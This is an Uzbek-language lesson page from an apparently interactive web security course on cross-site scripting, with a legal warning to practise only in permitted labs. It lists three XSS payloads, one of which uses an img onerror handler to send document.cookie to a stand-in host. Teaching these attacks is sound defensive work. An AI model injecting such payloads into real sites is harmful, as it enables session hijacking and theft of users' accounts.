O'quv darsi / Web Application Security

XSS (Cross-Site Scripting)

Brauzerda JS bajarish: reflected, stored, DOM-based.

25 daq.o'rta3 komanda3/5

Dars holati

Davom etmoqda

Amaliy komandalar0/3

Streak saqlash uchun kiring

Maqsadlar

3 XSS turi
Cookie o'g'irlash payload
CSP himoyasi

Faqat ruxsat etilgan muhitda mashq qiling

Bu darsdagi buyruqlar o'quv simulyatori va o'zingizga tegishli lablar uchun. Begona tizimlarni skanlash yoki sinash qonuniy javobgarlikka olib keladi.

Komandalar

Run tugmasi buyruqni o'ngdagi simulyatorga yuboradi; Copy esa real Kali terminalingiz uchun.

$<script>alert(document.domain)</script>

$<img src=x onerror='fetch(`//evil/?c=`+document.cookie)'>

$<svg/onload=alert(1)>

Oldingi dars Keyingi dars